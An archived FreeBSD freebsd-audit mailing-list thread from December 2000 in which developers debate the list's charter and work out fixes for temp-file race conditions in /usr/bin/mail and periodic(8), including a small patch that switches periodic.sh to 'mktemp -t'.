(cb34181-c.mdsn1.wi.home.com [24.183.3.139]) by hub.freebsd.org (Postfix) with ESMTP id 19AA037B400 for ; Fri, 8 Dec 2000 16:10:42 -0800 (PST) Received: (qmail 24646 invoked by uid 1000); 9 Dec 2000 00:10:40 -0000 Received: from localhost (sendmail-bs@127.0.0.1) by localhost with SMTP; 9 Dec 2000 00:10:40 -0000 Date: Fri, 8 Dec 2000 18:10:39 -0600 (CST) From: Mike Silbersack To: Will Andrews Cc: freebsd-audit@FreeBSD.ORG Subject: Re: bitchx/ircd DNS overflow demonstration (fwd) In-Reply-To: <20001208190004.S572@puck.firepipe.net> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-audit@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.ORG On Fri, 8 Dec 2000, Will Andrews wrote: > Err, this is out of the list's charter IMO. We're only here to audit > code in FreeBSD itself. > > Anyone want to clarify the charter? Actually, I don't see any charter > anywhere.. I was motivated to send this over to -audit due to the format string problem. Soon after the first one was exploited in BitchX (or was it something else?), it was found that a bunch were present in the base system as well. I figure that such DNS problems could be present in the base system as well, hence the info contained in the advisory would be useful to auditers. In any case, if you've already audited the handling of DNS in programs in the FreeBSD base system, I apologize. The info the advisory is clearly useless to you. Mike "Silby" Silbersack To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-audit" in the body of the message From owner-freebsd-audit Fri Dec 8 16:15:47 2000 From owner-freebsd-audit@FreeBSD.ORG Fri Dec 8 16:15:45 2000 Return-Path: Delivered-To: freebsd-audit@freebsd.org Received: from puck.firepipe.net (mcut-b-167.resnet.purdue.edu [128.211.209.167]) by hub.freebsd.org (Postfix) with ESMTP id AE3DA37B400 for ; Fri, 8 Dec 2000 16:15:44 -0800 (PST) Received: by puck.firepipe.net (Postfix, from userid 1000) id 4CFD818CF; Fri, 8 Dec 2000 19:15:44 -0500 (EST) Date: Fri, 8 Dec 2000 19:15:44 -0500 From: Will Andrews To: Mike Silbersack Cc: Will Andrews , freebsd-audit@FreeBSD.ORG Subject: Re: bitchx/ircd DNS overflow demonstration (fwd) Message-ID: <20001208191544.U572@puck.firepipe.net> Reply-To: Will Andrews References: <20001208190004.S572@puck.firepipe.net> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: ; from silby@silby.com on Fri, Dec 08, 2000 at 06:10:39PM -0600 X-Operating-System: FreeBSD 4.2-STABLE i386 Sender: will@puck.firepipe.net Sender: owner-freebsd-audit@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.ORG On Fri, Dec 08, 2000 at 06:10:39PM -0600, Mike Silbersack wrote: > In any case, if you've already audited the handling of DNS in programs in > the FreeBSD base system, I apologize. The info the advisory is clearly > useless to you. Oh, I'm so sorry. I misread your original message.. I thought you were asking us to review BitchX/ircd code. But clearly you meant to provide a pointer as to how to audit the base system for problems in DNS parsing. Deep apologies, please ignore my outburst. -- wca To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-audit" in the body of the message From owner-freebsd-audit Fri Dec 8 16:17:25 2000 From owner-freebsd-audit@FreeBSD.ORG Fri Dec 8 16:17:23 2000 Return-Path: Delivered-To: freebsd-audit@freebsd.org Received: from rover.village.org (rover.village.org [204.144.255.66]) by hub.freebsd.org (Postfix) with ESMTP id 0284A37B400 for ; Fri, 8 Dec 2000 16:17:21 -0800 (PST) Received: from harmony.village.org (harmony.village.org [10.0.0.6]) by rover.village.org (8.11.0/8.11.0) with ESMTP id eB90HJs53459; Fri, 8 Dec 2000 17:17:19 -0700 (MST) (envelope-from imp@harmony.village.org) Received: from harmony.village.org (localhost.village.org [127.0.0.1]) by harmony.village.org (8.9.3/8.8.3) with ESMTP id RAA16499; Fri, 8 Dec 2000 17:17:19 -0700 (MST) Message-Id: <200012090017.RAA16499@harmony.village.org> To: Will Andrews Subject: Re: bitchx/ircd DNS overflow demonstration (fwd) Cc: Mike Silbersack , freebsd-audit@FreeBSD.ORG In-reply-to: Your message of "Fri, 08 Dec 2000 19:00:04 EST." <20001208190004.S572@puck.firepipe.net> References: <20001208190004.S572@puck.firepipe.net> Date: Fri, 08 Dec 2000 17:17:18 -0700 From: Warner Losh Sender: imp@harmony.village.org Sender: owner-freebsd-audit@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.ORG In message <20001208190004.S572@puck.firepipe.net> Will Andrews writes: : On Fri, Dec 08, 2000 at 12:34:35AM -0600, Mike Silbersack wrote: : > Since people appear to be on an auditing rampage, I thought I'd forward : > this over to the list. It describes some DNS parsing bugs in a few ircds : > and BitchX that seem to have serious consequences. It may be worth a look : > into if programs in the base system have similar problems. : : Err, this is out of the list's charter IMO. We're only here to audit : code in FreeBSD itself. : : Anyone want to clarify the charter? Actually, I don't see any charter : anywhere.. When we created this list, we created it to coordinate a pass through the tree making sure that the code was doing things properly. Recently, people have been expanding its charter to include code reviews to ensure that code going into the system will not have new security holes (or old ones are identified). It is squishy if this includes ports or not. It isn't precluded, nor is it included. I'd say that we should go ahead and open it up on a provisional manner. One of four things will happen. 1) Nothing. No action needed. 2) A small number of changes will come in and the load won't be to bad. People on the list can easily keep up with it and do keep up with it. No action needed. 3) A huge number of changes and people keep up with it. So many changes come in that we need a new list. Action: audit-ports. 4) No one cares enough to bother, in which case we degenerate into #1 over time. Warner To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-audit" in the body of the message From owner-freebsd-audit Fri Dec 8 16:35:43 2000 From owner-freebsd-audit@FreeBSD.ORG Fri Dec 8 16:35:42 2000 Return-Path: Delivered-To: freebsd-audit@freebsd.org Received: from silby.com (cb34181-c.mdsn1.wi.home.com [24.183.3.139]) by hub.freebsd.org (Postfix) with ESMTP id 6B11C37B400 for ; Fri, 8 Dec 2000 16:35:42 -0800 (PST) Received: (qmail 24680 invoked by uid 1000); 9 Dec 2000 00:35:41 -0000 Received: from localhost (sendmail-bs@127.0.0.1) by localhost with SMTP; 9 Dec 2000 00:35:41 -0000 Date: Fri, 8 Dec 2000 18:35:41 -0600 (CST) From: Mike Silbersack To: Will Andrews Cc: freebsd-audit@FreeBSD.ORG Subject: Re: bitchx/ircd DNS overflow demonstration (fwd) In-Reply-To: <20001208191544.U572@puck.firepipe.net> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-audit@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.ORG On Fri, 8 Dec 2000, Will Andrews wrote: > I misread your original message.. I thought you were asking us to review > BitchX/ircd code. But clearly you meant to provide a pointer as to how > to audit the base system for problems in DNS parsing. > > Deep apologies, please ignore my outburst. Please ignore mine as well. I'll try to be more clear in my posts. Mike "Silby" Silbersack To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-audit" in the body of the message From owner-freebsd-audit Sat Dec 9 9: 8:23 2000 From owner-freebsd-audit@FreeBSD.ORG Sat Dec 9 09:08:21 2000 Return-Path: Delivered-To: freebsd-audit@freebsd.org Received: from heimdal.sunislelodge.com (dsl081-027-221-sea1.dsl-isp.net [64.81.27.221]) by hub.freebsd.org (Postfix) with ESMTP id EFC5237B400 for ; Sat, 9 Dec 2000 09:08:20 -0800 (PST) Received: from hayduke.sunislelodge.com (hayduke.sunislelodge.com [192.168.32.2]) by heimdal.sunislelodge.com (Postfix) with ESMTP id 2EAA66C802; Sat, 9 Dec 2000 12:08:36 -0500 (EST) Received: by hayduke.sunislelodge.com (Postfix, from userid 1000) id 584941B221; Sat, 9 Dec 2000 12:08:14 -0500 (EST) Date: Sat, 9 Dec 2000 12:08:14 -0500 From: John Hensley To: =?iso-8859-1?Q?Joachim_Str=F6mbergson?= Cc: Kris Kennaway , audit@FreeBSD.ORG Subject: Re: Project for auditors Message-ID: <20001209120814.A6148@hayduke.sunislelodge.com> References: <20001124143336.A70550@citusc17.usc.edu> <3A2141A0.7BF149C4@ludd.luth.se> Mime-Version: 1.0 Content-Type: text/plain; charset=iso-8859-1 Content-Disposition: inline Content-Transfer-Encoding: 8bit User-Agent: Mutt/1.2i In-Reply-To: <3A2141A0.7BF149C4@ludd.luth.se>; from watchman@ludd.luth.se on Sun, Nov 26, 2000 at 06:00:16PM +0100 Sender: owner-freebsd-audit@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.ORG At 18:00 +0100 26 November 2000, Joachim Strömbergson wrote: > Aloha! > > Kris Kennaway wrote: > > Here's something I just noticed../usr/bin/mail will repeatedly > > create files with the same name from mktemp(), of the form > > /tmp/RsXXXXXX (as well as some others). This needs to be fixed to > > use mkstemp() since theres the very easy to exploit race condition > > there. > > > > Anyone up for it? > > Well, I took a 5 min browse in the code. There are two files in mail > that uses mktemp: temp.c and quit.c. 5 instances from line 79 and > onward in file temp.c, and 1 instance on line 424 in quit.c > > Replacing mktemp() calls with mkstemp() calls was no problem. But > since I don't trust myself on this (yet, hopefully), I'm unsure what I > need to change in the code surrounding the actual call. The man page > describes the NULL vs -1 diffs. I took a look at the patch for > printjob.c and am trying to adapt the way it calls mkstemp(). I took that approach, and then one that was more work, which I'm now feeling silly about, 'cause 1) I should have checked the OpenBSD source first, as they took a similar tack and I could have done it better and saved myself a bunch of time, and 2) I'm thinking simply keeping the descriptors from mkstemp() calls in temp.c open for the life of the program might work better. Either way you fix the mktemp() race, but I think the way OpenBSD did it, there's still the possibility of a DOS, in that you could /usr/bin/mktemp the same patterns and fill /tmp until mail can't create any temporary files. If mail mkstemp()s them at startup, and reopens them correctly (truncating where necessary), which I think is the case, you either get the resources and are good as long as you're running, or you stop immediately. So does anyone more experienced see a reason you'd want to follow OpenBSD and go through all the code and use *really* temporary files everywhere you want one, instead of reusing a set of them that you keep open? > Also, in the quit.c the temp file is deleted by rm(tempname) on line > 448. Should I use unlink() instead? The rm() call in fio.c actually calls unlink, after making sure its target is a real file. John To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-audit" in the body of the message From owner-freebsd-audit Sat Dec 9 12: 8:55 2000 From owner-freebsd-audit@FreeBSD.ORG Sat Dec 9 12:08:53 2000 Return-Path: Delivered-To: freebsd-audit@freebsd.org Received: from peitho.fxp.org (peitho.fxp.org [209.26.95.40]) by hub.freebsd.org (Postfix) with ESMTP id 8489D37B400 for ; Sat, 9 Dec 2000 12:08:53 -0800 (PST) Received: by peitho.fxp.org (Postfix, from userid 1000) id 3CDE713612; Sat, 9 Dec 2000 15:08:54 -0500 (EST) Date: Sat, 9 Dec 2000 15:08:54 -0500 From: Chris Faulhaber To: freebsd-audit@FreeBSD.org Subject: mktemp(1) usage Message-ID: <20001209150853.A57045@peitho.fxp.org> Mail-Followup-To: Chris Faulhaber , freebsd-audit@FreeBSD.org Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i Sender: owner-freebsd-audit@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.ORG Would it be more appropriate for scripts such as periodic(8) to call mktemp(1) using the -t flag. In addition to using TMPDIR, this allows the use of the system's _PATH_TMP instead of hardcoding /tmp. -- Chris D. Faulhaber - jedgar@fxp.org - jedgar@FreeBSD.org -------------------------------------------------------- FreeBSD: The Power To Serve - http://www.FreeBSD.org Index: periodic.sh =================================================================== RCS file: /home/ncvs/src/usr.sbin/periodic/periodic.sh,v retrieving revision 1.19 diff -u -r1.19 periodic.sh --- periodic.sh 2000/11/26 03:37:34 1.19 +++ periodic.sh 2000/12/03 17:50:51 @@ -27,7 +27,7 @@ host=`hostname` export host -tmp_output=`mktemp ${TMPDIR:-/tmp}/periodic.XXXXXXXXXX` +tmp_output=`mktemp -t periodic` # Execute each executable file in the directory list. If the x bit is not # set, assume the user didn't really want us to muck with it (it's a To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-audit" in the body of the message From owner-freebsd-audit Sat Dec 9 14:13:37 2000 From owner-freebsd-audit@FreeBSD.ORG Sat Dec 9 14:13:36 2000 Return-Path: Delivered-To: freebsd-audit@freebsd.org Received: from puck.firepipe.net (mcut-b-167.resnet.purdue.edu [128.211.209.167]) by hub.freebsd.org (Postfix) with ESMTP id D0DA337B400 for ; Sat, 9 Dec 2000 14:13:35 -0800 (PST) Received: by puck.firepipe.net (Postfix, from userid 1000) id D4B1619A2; Sat, 9 Dec 2000 17:13:34 -0500 (EST) Date: Sat, 9 Dec 2000 17:13:34 -0500 From: Will Andrews To: Chris Faulhaber Cc: freebsd-audit@FreeBSD.ORG Subject: Re: mktemp(1) usage Message-ID: <20001209171334.J671@puck.firepipe.net> Reply-To: Will Andrews References: <20001209150853.A57045@peitho.fxp.org> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <20001209150853.A57045@peitho.fxp.org>; from jedgar@fxp.org on Sat, Dec 09, 2000 at 03:08:54PM -0500 X-Operating-System: FreeBSD 4.2-STABLE i386 Sender: will@puck.firepipe.net Sender: owner-freebsd-audit@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.ORG On Sat, Dec 09, 2000 at 03:08:54PM -0500, Chris Faulhaber wrote: > Would it be more appropriate for scripts such as periodic(8) to > call mktemp(1) using the -t flag. In addition to using TMPDIR, > this allows the use of the system's _PATH_TMP instead of > hardcoding /tmp. Maybe that method doesn't use a random enough number to avoid file races? -- wca To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-audit" in the body of the message From owner-freebsd-audit Sat Dec 9 18:32:14 2000 From owner-freebsd-audit@FreeBSD.ORG Sat Dec 9 18:32:13 2000 Return-Path: Delivered-To: freebsd-audit@freebsd.org Received: from peitho.fxp.org (peitho.fxp.org [209.26.95.40]) by hub.freebsd.org (Postfix) with ESMTP id 3070737B400 for ; Sat, 9 Dec 2000 18:32:13 -0800 (PST) Received: by peitho.fxp.org (Postfix, from userid 1000) id 036D213612; Sat, 9 Dec 2000 21:32:17 -0500 (EST) Date: Sat, 9 Dec 2000 21:32:17 -0500 From: Chris Faulhaber To: Will Andrews Cc: freebsd-audit@FreeBSD.ORG Subject: Re: mktemp(1) usage Message-ID: <20001209213217.A10185@peitho.fxp.org> Mail-Followup-To: Chris Faulhaber , Will Andrews , freebsd-audit@FreeBSD.ORG References: <20001209150853.A57045@peitho.fxp.org> <20001209171334.J671@puck.firepipe.net> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <20001209171334.J671@puck.firepipe.net>; from will@physics.purdue.edu on Sat, Dec 09, 2000 at 05:13:34PM -0500 Sender: owner-freebsd-audit@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.ORG On Sat, Dec 09, 2000 at 05:13:34PM -0500, Will Andrews wrote: > On Sat, Dec 09, 2000 at 03:08:54PM -0500, Chris Faulhaber wrote: > > Would it be more appropriate for scripts such as periodic(8) to > > call mktemp(1) using the -t flag. In addition to using TMPDIR, > > this allows the use of the system's _PATH_TMP instead of > > hardcoding /tmp. > > Maybe that method doesn't use a random enough number to avoid file > races? > If you are talking about mktemp(1), it uses: tmpdir = getenv("TMPDIR"); if (tmpdir == NULL) asprintf(&name, "%s%s.XXXXXXXX", _PATH_TMP, prefix); else asprintf(&name, "%s/%s.XXXXXXXX", tmpdir, prefix); which should be adequate. Perhaps we should add a few more X's? :) -- Chris D. Faulhaber - jedgar@fxp.org - jedgar@FreeBSD.org -------------------------------------------------------- FreeBSD: The Power To Serve - http://www.FreeBSD.org To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-audit" in the body of the message From owner-freebsd-audit Sat Dec 9 21:26:14 2000 From owner-freebsd-audit@FreeBSD.ORG Sat Dec 9 21:26:13 2000 Return-Path: Delivered-To: freebsd-audit@freebsd.org Received: from rover.village.org (rover.village.org [204.144.255.66]) by hub.freebsd.org (Postfix) with ESMTP id 1980637B400 for ; Sat, 9 Dec 2000 21:26:12 -0800 (PST) Received: from harmony.village.org (harmony.village.org [10.0.0.6]) by rover.village.org (8.11.0/8.11.0) with ESMTP id eBA5Q6s61045; Sat, 9 Dec 2000 22:26:07 -0700 (MST) (envelope-from imp@harmony.village.org) Received: from harmony.village.org (localhost.village.org [127.0.0.1]) by harmony.village.org (8.9.3/8.8.3) with ESMTP id WAA26396; Sat, 9 Dec 2000 22:26:06 -0700 (MST) Message-Id: <200012100526.WAA26396@harmony.village.org> To: Chris Faulhaber Subject: Re: mktemp(1) usage Cc: freebsd-audit@FreeBSD.ORG In-reply-to: Your message of "Sat, 09 Dec 2000 15:08:54 EST." <20001209150853.A57045@peitho.fxp.org> References: <20001209150853.A57045@peitho.fxp.org> Date: Sat, 09 Dec 2000 22:26:06 -0700 From: Warner Losh Sender: imp@harmony.village.org Sender: owner-freebsd-audit@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.ORG In message <20001209150853.A57045@peitho.fxp.org> Chris Faulhaber writes: : Would it be more appropriate for scripts such as periodic(8) to : call mktemp(1) using the -t flag. In addition to using TMPDIR, : this allows the use of the system's _PATH_TMP instead of : hardcoding /tmp. I think so. Warner To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-audit" in the body of the message From owner-freebsd-audit Sat Dec 9 21:29:54 2000 From owner-freebsd-audit@FreeBSD.ORG Sat Dec 9 21:29:53 2000 Return-Path: Delivered-To: freebsd-audit@freebsd.org Received: from rover.village.org (rover.village.org [204.144.255.66]) by hub.freebsd.org (Postfix) with ESMTP id 83A7737B401 for ; Sat, 9 Dec 2000 21:29:52 -0800 (PST) Received: from harmony.village.org (harmony.village.org [10.0.0.6]) by rover.village.org (8.11.0/8.11.0) with ESMTP id eBA5Tps61075; Sat, 9 Dec 2000 22:29:51 -0700 (MST) (envelope-from imp@harmony.village.org) Received: from harmony.village.org (localhost.village.org [127.0.0.1]) by harmony.village.org (8.9.3/8.8.3) with ESMTP id WAA26442; Sat, 9 Dec 2000 22:29:51 -0700 (MST) Message-Id: <200012100529.WAA26442@harmony.village.org> To: Will Andrews Subject: Re: mktemp(1) usage Cc: Chris Faulhaber , freebsd-audit@FreeBSD.ORG In-reply-to: Your message of "Sat, 09 Dec 2000 17:13:34 EST." <20001209171334.J671@puck.firepipe.net> References: <20001209171334.J671@puck.firepipe.net> <20001209150853.A57045@peitho.fxp.org> Date: Sat, 09 Dec 2000 22:29:50 -0700 From: Warner Losh Sender: imp@harmony.village.org Sender: owner-freebsd-audit@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.ORG In message <20001209171334.J671@puck.firepipe.net> Will Andrews writes: : On Sat, Dec 09, 2000 at 03:08:54PM -0500, Chris Faulhaber wrote: : > Would it be more appropriate for scripts such as periodic(8) to : > call mktemp(1) using the -t flag. In addition to using TMPDIR, : > this allows the use of the system's _PATH_TMP instead of : > hardcoding /tmp. : : Maybe that method doesn't use a random enough number to avoid file : races? If it doesn't, then maybe it should, don't you think. But I think it does. We're looking at 8 X's. It would also be a good place to bump it to 10 if we needed to, say. Warner To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-audit" in the body of the message